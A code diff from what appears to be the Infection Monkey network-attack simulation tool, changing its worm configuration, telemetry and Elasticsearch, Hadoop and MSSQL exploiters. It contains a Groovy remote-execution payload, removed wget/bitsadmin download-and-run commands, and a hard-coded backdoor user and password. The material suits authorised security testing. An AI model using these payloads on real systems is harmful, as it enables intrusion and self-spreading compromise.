STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
},
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
},
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
},
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
}
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: []
}
PRINCIPLES_TO_TESTS = {}
PRINCIPLES_TO_PILLARS = {}
def populate_mappings():
populate_pillars_to_tests()
populate_principles_to_tests()
populate_principles_to_pillars()
def populate_pillars_to_tests():
for pillar in PILLARS:
for test, test_info in TESTS_MAP.items():
if pillar in test_info[PILLARS_KEY]:
PILLARS_TO_TESTS[pillar].append(test)
def populate_principles_to_tests():
for single_principle in PRINCIPLES:
PRINCIPLES_TO_TESTS[single_principle] = []
for test, test_info in TESTS_MAP.items():
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
def populate_principles_to_pillars():
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
principles_pillars = set()
for test in principle_tests:
for pillar in TESTS_MAP[test][PILLARS_KEY]:
principles_pillars.add(pillar)
PRINCIPLES_TO_PILLARS[principle] = principles_pillars

View File

@ -5,9 +5,12 @@ from abc import ABCMeta, abstractmethod
import ipaddress
from six import text_type
import logging
__author__ = 'itamar'
LOG = logging.getLogger(__name__)
class NetworkRange(object):
__metaclass__ = ABCMeta
@ -47,12 +50,23 @@ class NetworkRange(object):
address_str = address_str.strip()
if not address_str: # Empty string
return None
if -1 != address_str.find('-'):
if NetworkRange.check_if_range(address_str):
return IpRange(ip_range=address_str)
if -1 != address_str.find('/'):
return CidrRange(cidr_range=address_str)
return SingleIpRange(ip_address=address_str)
@staticmethod
def check_if_range(address_str):
if -1 != address_str.find('-'):
ips = address_str.split('-')
try:
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
except ValueError as e:
return False
return True
return False
@staticmethod
def _ip_to_number(address):
return struct.unpack(">L", socket.inet_aton(address))[0]
@ -111,13 +125,58 @@ class IpRange(NetworkRange):
class SingleIpRange(NetworkRange):
def __init__(self, ip_address, shuffle=True):
super(SingleIpRange, self).__init__(shuffle=shuffle)
self._ip_address = ip_address
self._ip_address, self.domain_name = self.string_to_host(ip_address)
def __repr__(self):
return "<SingleIpRange %s>" % (self._ip_address,)
def __iter__(self):
"""
We have to check if we have an IP to return, because user could have entered invalid
domain name and no IP was found
:return: IP if there is one
"""
if self.ip_found():
yield self._number_to_ip(self.get_range()[0])
def is_in_range(self, ip_address):
return self._ip_address == ip_address
def _get_range(self):
return [SingleIpRange._ip_to_number(self._ip_address)]
def ip_found(self):
"""
Checks if we could translate domain name entered into IP address
:return: True if dns found domain name and false otherwise
"""
return self._ip_address
@staticmethod
def string_to_host(string):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
:param string: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""
# The most common use case is to enter ip/range into "Scan IP/subnet list"
domain_name = ''
# Make sure to have unicode string
user_input = string.decode('utf-8', 'ignore')
# Try casting user's input as IP
try:
ip = ipaddress.ip_address(user_input).exploded
except ValueError:
# Exception means that it's a domain name
try:
ip = socket.gethostbyname(string)
domain_name = string
except socket.error:
LOG.error("Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string))
return None, string
# If a string was entered instead of IP we presume that it was domain name and translate it
return ip, domain_name

View File

@ -0,0 +1,23 @@
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
"""
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
:param ip_addresses: List[str]: List of IP addresses to test.
:param source_subnet: NetworkRange: Subnet to want an IP to not be in.
:param target_subnet: NetworkRange: Subnet we want an IP to be in.
:return: The cross segment IP if in source but not in target, else None. Union[str, None]
"""
if get_ip_if_in_subnet(ip_addresses, target_subnet) is not None:
return None
return get_ip_if_in_subnet(ip_addresses, source_subnet)
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):
return ip_address
return None

View File

@ -0,0 +1,30 @@
from common.network.network_range import *
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
class TestSegmentationUtils(IslandTestCase):
def test_get_ip_in_src_and_not_in_dst(self):
self.fail_if_not_testing_env()
source = CidrRange("1.1.1.0/24")
target = CidrRange("2.2.2.0/24")
# IP not in both
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
))
# IP not in source, in target
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("2.2.2.2")], source, target
))
# IP in source, not in target
self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
))
# IP in both subnets
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
))

View File

@ -0,0 +1,36 @@
from enum import Enum
class ScanStatus(Enum):
# Technique wasn't scanned
UNSCANNED = 0
# Technique was attempted/scanned
SCANNED = 1
# Technique was attempted and succeeded
USED = 2
class UsageEnum(Enum):
SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."}
MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."}
MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."}
DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful."}
DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
# Dict that describes what BITS job was used for
BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."
def format_time(time):
return "%s-%s %s:%s:%s" % (time.date().month,
time.date().day,
time.time().hour,
time.time().minute,
time.time().second)

View File

@ -0,0 +1,10 @@
# abstract, static method decorator
class abstractstatic(staticmethod):
__slots__ = ()
def __init__(self, function):
super(abstractstatic, self).__init__(function)
function.__isabstractmethod__ = True
__isabstractmethod__ = True

View File

@ -0,0 +1,7 @@
from enum import Enum
class ExploitType(Enum):
VULNERABILITY = 1
OTHER = 8
BRUTE_FORCE = 9

View File

@ -1,2 +1,2 @@
#!/bin/bash
pyinstaller --clean monkey-linux.spec
pyinstaller -F --log-level=DEBUG --clean monkey.spec

View File

@ -1 +1 @@
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec

View File

@ -1,3 +1,4 @@
import hashlib
import os
import json
import sys
@ -7,17 +8,17 @@ from abc import ABCMeta
from itertools import product
import importlib
importlib.import_module('infection_monkey', 'network')
__author__ = 'itamar'
GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
class Configuration(object):
def from_kv(self, formatted_data):
# now we won't work at <2.7 for sure
network_import = importlib.import_module('infection_monkey.network')
@ -35,9 +36,6 @@ class Configuration(object):
if key == 'finger_classes':
class_objects = [getattr(network_import, val) for val in value]
setattr(self, key, class_objects)
elif key == 'scanner_class':
scanner_object = getattr(network_import, value)
setattr(self, key, scanner_object)
elif key == 'exploiter_classes':
class_objects = [getattr(exploit_import, val) for val in value]
setattr(self, key, class_objects)
@ -58,6 +56,12 @@ class Configuration(object):
result = self.from_kv(formatted_data)
return result
@staticmethod
def hide_sensitive_info(config_dict):
for field in SENSITIVE_FIELDS:
config_dict[field] = HIDDEN_FIELD_REPLACEMENT_CONTENT
return config_dict
def as_dict(self):
result = {}
for key in dir(Configuration):
@ -105,8 +109,8 @@ class Configuration(object):
dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh'
dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
dropper_target_path_linux = '/tmp/monkey'
###########################
@ -133,15 +137,14 @@ class Configuration(object):
# how many scan iterations to perform on each run
max_iterations = 1
scanner_class = None
finger_classes = []
exploiter_classes = []
# how many victims to look for in a single scan iteration
victims_max_find = 30
victims_max_find = 100
# how many victims to exploit before stopping
victims_max_exploit = 7
victims_max_exploit = 15
# depth of propagation
depth = 2
@ -159,10 +162,13 @@ class Configuration(object):
retry_failed_explotation = True
# addresses of internet servers to ping and check if the monkey has internet acccess.
internet_services = ["monkey.guardicore.com", "www.google.com"]
internet_services = ["updates.infectionmonkey.com", "www.google.com"]
keep_tunnel_open_time = 60
# Monkey files directory name
monkey_dir_name = 'monkey_dir'
###########################
# scanners config
###########################
@ -177,7 +183,7 @@ class Configuration(object):
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
8008, # HTTP alternate
8008, # HTTP alternate
7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
@ -193,7 +199,7 @@ class Configuration(object):
9200]
tcp_target_ports.extend(HTTP_PORTS)
tcp_scan_timeout = 3000 # 3000 Milliseconds
tcp_scan_interval = 200
tcp_scan_interval = 0 # in milliseconds
tcp_scan_get_banner = True
# Ping Scanner
@ -203,14 +209,12 @@ class Configuration(object):
# exploiters config
###########################
should_exploit = True
skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!"
# rdp exploiter
rdp_use_vbs_download = True
user_to_add = "Monkey_IUSER_SUPPORT"
remote_user_pass = "Password1!"
# User and password dictionaries for exploits.
@ -268,5 +272,23 @@ class Configuration(object):
extract_azure_creds = True
post_breach_actions = []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data).hexdigest()
return password_hashed
WormConfiguration = Configuration()

View File

@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from infection_monkey.config import WormConfiguration, GUID
from infection_monkey.network.info import local_ips, check_internet_access
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT
from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy
@ -19,9 +19,12 @@ requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
TIMEOUT = 15
TIMEOUT_IN_SECONDS = 15
class ControlClient(object):
@ -76,7 +79,7 @@ class ControlClient(object):
requests.get("https://%s/api?action=is-up" % (server,),
verify=False,
proxies=ControlClient.proxies,
timeout=TIMEOUT)
timeout=TIMEOUT_IN_SECONDS)
WormConfiguration.current_server = current_server
break
@ -120,11 +123,12 @@ class ControlClient(object):
return {}
@staticmethod
def send_telemetry(telem_type, data):
def send_telemetry(telem_category, data):
if not WormConfiguration.current_server:
LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category)
return
try:
telemetry = {'monkey_guid': GUID, 'telem_type': telem_type, 'data': data}
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
@ -165,7 +169,8 @@ class ControlClient(object):
try:
unknown_variables = WormConfiguration.from_kv(reply.json().get('config'))
LOG.info("New configuration was loaded from server: %r" % (WormConfiguration.as_dict(),))
LOG.info("New configuration was loaded from server: %r" %
(WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),))
except Exception as exc:
# we don't continue with default conf here because it might be dangerous
LOG.error("Error parsing JSON reply from control server %s (%s): %s",
@ -306,3 +311,13 @@ class ControlClient(object):
target_addr, target_port = None, None
return tunnel.MonkeyTunnel(proxy_class, target_addr=target_addr, target_port=target_port)
@staticmethod
def get_pba_file(filename):
try:
return requests.get(PBA_FILE_DOWNLOAD %
(WormConfiguration.current_server, filename),
verify=False,
proxies=ControlClient.proxies)
except requests.exceptions.RequestException:
return False

View File

@ -11,9 +11,11 @@ from ctypes import c_char_p
import filecmp
from infection_monkey.config import WormConfiguration
from infection_monkey.exploit.tools import build_monkey_commandline_explicitly
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX
from infection_monkey.system_info import SystemInfoCollector, OperatingSystem
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
from common.utils.attack_utils import ScanStatus, UsageEnum
if "win32" == sys.platform:
from win32process import DETACHED_PROCESS
@ -51,7 +53,6 @@ class MonkeyDrops(object):
LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))
def start(self):
if self._config['destination_path'] is None:
LOG.error("No destination path specified")
return False
@ -157,5 +158,6 @@ class MonkeyDrops(object):
else:
LOG.debug("Dropper source file '%s' is marked for deletion on next boot",
self._config['source_path'])
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
except AttributeError:
LOG.error("Invalid configuration options. Failing")

View File

@ -1,4 +1,5 @@
{
"should_exploit": true,
"command_servers": [
"192.0.2.0:5000"
],
@ -8,7 +9,7 @@
],
"keep_tunnel_open_time": 60,
"subnet_scan_list": [
],
"inaccessible_subnets": [],
"blocked_ips": [],
@ -16,6 +17,7 @@
"alive": true,
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true,
"depth": 2,
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
@ -23,10 +25,11 @@
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true,
"dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey",
"monkey_dir_name": "monkey_dir",
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
@ -40,7 +43,9 @@
"SambaCryExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter"
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter"
],
"finger_classes": [
"SSHFinger",
@ -56,14 +61,12 @@
"monkey_log_path_linux": "/tmp/user-1563",
"send_log_to_server": true,
"ms08_067_exploit_attempts": 5,
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
"ms08_067_remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT",
"remote_user_pass": "Password1!",
"ping_scan_timeout": 10000,
"rdp_use_vbs_download": true,
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey",
"retry_failed_explotation": true,
"scanner_class": "TcpScanner",
"self_delete_in_cleanup": true,
"serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
@ -78,7 +81,7 @@
"sambacry_shares_not_to_check": ["IPC$", "print$"],
"local_network_scan": false,
"tcp_scan_get_banner": true,
"tcp_scan_interval": 200,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 10000,
"tcp_target_ports": [
22,
@ -91,10 +94,16 @@
3306,
8008,
9200,
7001
7001,
8088
],
"timeout_between_iterations": 10,
"use_file_logging": true,
"victims_max_exploit": 7,
"victims_max_find": 30
"victims_max_exploit": 15,
"victims_max_find": 100,
"post_breach_actions" : []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
}

View File

@ -1,5 +1,7 @@
from abc import ABCMeta, abstractmethod
from abc import ABCMeta, abstractmethod, abstractproperty
import infection_monkey.config
from common.utils.exploit_enum import ExploitType
from datetime import datetime
__author__ = 'itamar'
@ -9,35 +11,75 @@ class HostExploiter(object):
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@abstractproperty
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = infection_monkey.config.WormConfiguration
self._exploit_info = {}
self._exploit_attempts = []
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.control import ControlClient
ControlClient.send_telemetry(
'exploit',
{'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__,
'info': self._exploit_info, 'attempts': self._exploit_attempts})
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self._exploit_attempts.append({'result': result, 'user': user, 'password': password,
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
@abstractmethod
def exploit_host(self):
self.pre_exploit()
result = self._exploit_host()
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
from infection_monkey.exploit.wmiexec import WmiExploiter
from infection_monkey.exploit.smbexec import SmbExploiter
from infection_monkey.exploit.rdpgrinder import RdpExploiter
from infection_monkey.exploit.sshexec import SSHExploiter
from infection_monkey.exploit.shellshock import ShellShockExploiter
from infection_monkey.exploit.sambacry import SambaCryExploiter
@ -45,3 +87,5 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
from infection_monkey.exploit.vsftpd import VSFTPDExploiter

View File

@ -8,8 +8,12 @@ import json
import logging
import requests
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT
from common.data.network_consts import ES_SERVICE
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING
import re
@ -26,6 +30,7 @@ class ElasticGroovyExploiter(WebRCE):
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search'
def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host)
@ -34,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
return exploit_config
def get_open_service_ports(self, port_list, names):
@ -47,12 +52,22 @@ class ElasticGroovyExploiter(WebRCE):
def exploit(self, url, command):
command = re.sub(r"\\", r"\\\\\\\\", command)
payload = self.JAVA_CMD % command
response = requests.get(url, data=payload)
try:
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
return False
result = self.get_results(response)
if not result:
return False
return result[0]
def upload_monkey(self, url, commands=None):
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
if 'windows' in self.host.os['type'] and result:
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
return result
def get_results(self, response):
"""
Extracts the result data from our attack
@ -63,3 +78,20 @@ class ElasticGroovyExploiter(WebRCE):
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
except (KeyError, IndexError):
return None
def check_if_exploitable(self, url):
# Overridden web_rce method that adds CMD prefix for windows command
try:
if 'windows' in self.host.os['type']:
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
else:
resp = self.exploit(url, CHECK_COMMAND)
if resp is True:
return True
elif resp is not False and ID_STRING in resp:
return True
else:
return False
except Exception as e:
LOG.error("Host's exploitability check failed due to: %s" % e)
return False

View File

@ -11,8 +11,9 @@ import logging
import posixpath
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import MONKEY_ARG, ID_STRING
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth
from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
__author__ = 'VakarisZ'
@ -21,17 +22,8 @@ LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Hadoop'
HADOOP_PORTS = [["8088", False]]
# We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
# to download monkey at the same time
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
"&& wget -O %(monkey_path)s %(http_path)s " \
"; chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
" Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
@ -40,12 +32,15 @@ class HadoopExploiter(WebRCE):
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def exploit_host(self):
def _exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
# We presume hadoop works only on 64-bit machines
if self.host.os['type'] == 'windows':
self.host.os['machine'] = '64'
paths = self.get_monkey_paths()
if not paths:
return False
@ -55,6 +50,7 @@ class HadoopExploiter(WebRCE):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
self.add_executed_cmd(command)
return True
def exploit(self, url, command):
@ -79,9 +75,9 @@ class HadoopExploiter(WebRCE):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']:
base_command = self.LINUX_COMMAND
base_command = HADOOP_LINUX_COMMAND
else:
base_command = self.WINDOWS_COMMAND
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}

View File

@ -0,0 +1,197 @@
import logging
import os
import sys
from time import sleep
import pymssql
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import DROPPER_ARG
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
LOG = logging.getLogger(__name__)
class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = 'MSSQL'
_TARGET_OS_TYPE = ['windows']
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
LOGIN_TIMEOUT = 15
# Time in seconds to wait between MSSQL queries.
QUERY_BUFFER = 0.5
SQL_DEFAULT_TCP_PORT = '1433'
# Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = 'tmp_monkey.bat'
